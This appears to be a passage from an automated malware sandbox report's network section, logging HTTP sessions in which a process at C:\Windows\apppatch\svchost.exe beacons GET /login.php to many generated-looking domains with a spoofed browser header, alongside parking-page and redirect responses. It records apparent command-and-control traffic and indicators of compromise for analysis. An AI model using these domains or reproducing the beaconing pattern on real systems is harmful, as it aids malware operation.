                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww16.vofycot.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1731346399.8350699
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.614780903 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:47 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_m5A0R189VdRkhk6hmyfDOBi+fLPvinMypX1PgaLoCArcIYQprgYuUGmmAqrfmhsw4vTfrSS03w1iz0DYCdt3IA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:33:47 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-bsx5j
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6d 35 41 30 52 31 38 39 56 64 52 6b 68 6b 36 68 6d 79 66 44 4f 42 69 2b 66 4c 50 76 69 6e 4d 79 70 58 31 50 67 61 4c 6f 43 41 72 63 49 59 51 70 72 67 59 75 55 47 6d 6d 41 71 72 66 6d 68 73 77 34 76 54 66 72 53 53 30 33 77 31 69 7a 30 44 59 43 64 74 33 49 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 308<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_m5A0R189VdRkhk6hmyfDOBi+fLPvinMypX1PgaLoCArcIYQprgYuUGmmAqrfmhsw4vTfrSS03w1iz0DYCdt3IA==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.614903927 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                              Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you AE6are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.614917994 CET1236INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                              Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.615534067 CET1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                              Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.615546942 CET682INData Raw: 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73
                                                                                                                                                                                                              Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616242886 CET1236INData Raw: 31 35 44 32 0d 0a 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f
                                                                                                                                                                                                              Data Ascii: 15D2ition:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616255045 CET212INData Raw: 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78
                                                                                                                                                                                                              Data Ascii: er-collapse:collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inl
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616265059 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72
                                                                                                                                                                                                              Data Ascii: ine-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--suc
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616899014 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c
                                                                                                                                                                                                              Data Ascii: bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616910934 CET424INData Raw: 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34
                                                                                                                                                                                                              Data Ascii: ng.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows.png") #0
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.620790958 CET1236INData Raw: 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 6c 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 37 32 30 70 78 7d 2e 63 6f 6e 74 61 69
                                                                                                                                                                                                              Data Ascii: 1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.container-content--twot .container-content__container-ads--twot{m


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              43192.168.2.86066972.52.179.174807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.615560055 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              44192.168.2.86067372.52.179.174807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.035198927 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              45192.168.2.860687188.114.96.380
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.747579098 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              46192.168.2.86069075.2.71.19980
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.765811920 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              47192.168.2.86069475.2.71.19980
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.904922009 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              48192.168.2.86069544.221.84.10580
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.927210093 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
                                                                                                                                                                                                              Cookie: snkz=66.23.206.109; btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              49192.168.2.860696188.114.96.380
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.937165976 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              50192.168.2.860698188.114.96.380
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.946805954 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              51192.168.2.860700208.100.26.24580
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.952369928 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              52192.168.2.86070244.221.84.10580
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.953007936 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vocyzit.com
                                                                                                                                                                                                              Cookie: snkz=66.23.206.109; btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              53192.168.2.860709199.191.50.8380
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.774730921 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galyqaz.com
                                                                                                                                                                                                              Cookie: vsid=903vr478891988923922560


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              54192.168.2.8607103.94.10.3480
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.774811029 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lymyxid.com
                                                                                                                                                                                                              Cookie: snkz=66.23.206.109; btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              55192.168.2.854072178.162.203.20280
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.393389940 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              56192.168.2.854073162.255.119.102807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401355982 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.983468056 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              57192.168.2.857726188.114.96.3807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.525770903 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.235574007 CET980INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tklgkpdYvMOWRKecf4jC1%2BOF1aHCUUGn8WLxPfbX2Rh6BCsDlG8Zlg%2B%2BT8%2B%2FEbaEPxa%2FQIC0z7Rz7Qo8mtQ%2BMxG4uiUmXM%2BL%2ByL0tDpT3ykSa3wjA06f0x7VtBjNQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10095b1b8543f9-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1525&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              58192.168.2.857727199.59.243.227807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.553469896 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.985515118 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                              x-request-id: d7d3fb0a-0f39-4189-8a8c-fa00b75db873
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                              set-cookie: parking_session=d7d3fb0a-0f39-4189-8a8c-fa00b75db873; expires=Mon, 11 Nov 2024 17:50:02 GMT; path=/
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.985552073 CET528INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
